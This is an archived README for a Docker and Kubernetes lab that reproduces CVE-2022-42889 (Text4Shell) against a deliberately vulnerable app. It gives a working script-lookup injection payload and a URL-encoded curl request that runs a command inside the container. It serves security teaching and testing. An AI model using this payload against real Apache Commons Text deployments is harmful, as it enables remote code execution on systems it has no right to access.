关联漏洞
描述
Kubernetes Lab for CVE-2022-42889
介绍
# Text4Shell CVE-2022-42889
## Docker Lab for CVE-2022-42889
> You can either build the Docker image locally or pull the image from Docker Hub and run the container.
### Clone the repo
```bash
git clone https://github.com/devenes/text4shell-cve-2022-42889.git
```
### Build the Docker image locally
```bash
docker build --tag=text4shell .
```
### Run the Docker container
```bash
docker run -d --rm -p 8080:8080 text4shell
```
### Or pull the image from Docker Hub and run the container
```bash
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0
```
### Test the app by passing a string to the `search` parameter:
```bash
curl http://localhost/text4shell/attack?search=<anything>
```
- Attack can be performed by passing a string `${prefix:name}` where the prefix is the aforementioned lookup:
```java
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```
### Attack using `curl`:
```bash
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
```
- You can also try using `dns` or `url` prefixes
### Get the container id
```bash
docker container ls
```
### Get into the container
```bash
docker exec -it <container_id> bash
```
### Check if the RCE attack was successful
- You should see a file named `foo` created in the `/tmp` directory:
```bash
ls /tmp/
```
### You can stop the container by running the following command
```bash
docker container stop <container_id>
```
## Kubernetes Lab for CVE-2022-42889
### Change the directory to `kubernetes` and follow the instructions in the `README.md` file.
```bash
cd kubernetes
```
### Create kind cluster
```bash
kind create cluster --config kind-config.yaml
```
### Deploy the vulnerable app to the cluster
```bash
kubectl apply -f deployment.yaml
```
### Create a service to expose the app
```bash
kubectl apply -f service.yaml
```
### Attack the vulnerable app using `curl`
```bash
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
```
### Get the pod name using `kubectl get pods`
```bash
kubectl get pods
```
### Get into the pod using `kubectl exec`
```bash
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash
```
### Check if the attack was successful
```bash
ls /tmp/ | grep foo
```
### You can find the detailed tutorial on my [Udemy course here](https://www.udemy.com/course/owasp-top-10-for-docker-and-kubernetes-security/)
---
References:
- https://github.com/karthikuj/cve-2022-42889-text4shell-docker
- https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
- https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
- https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
文件快照
[4.0K] /data/pocs/376de4e78bbadc49853211d97a465aff8de099ac
├── [1.3K] Dockerfile
├── [4.0K] kubernetes
│ ├── [ 378] deployment.yaml
│ ├── [ 187] kind-config.yaml
│ └── [ 214] service.yaml
├── [1.6K] pom.xml
├── [2.9K] README.md
└── [4.0K] src
├── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] levo
│ └── [4.0K] dockerexample
│ ├── [4.0K] controller
│ │ └── [1002] HelloController.java
│ └── [ 297] DockerApp.java
└── [4.0K] test
└── [4.0K] java
└── [4.0K] com
└── [4.0K] levo
└── [4.0K] dockerexample
└── [ 70] PlaceHolderForTest.java
13 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。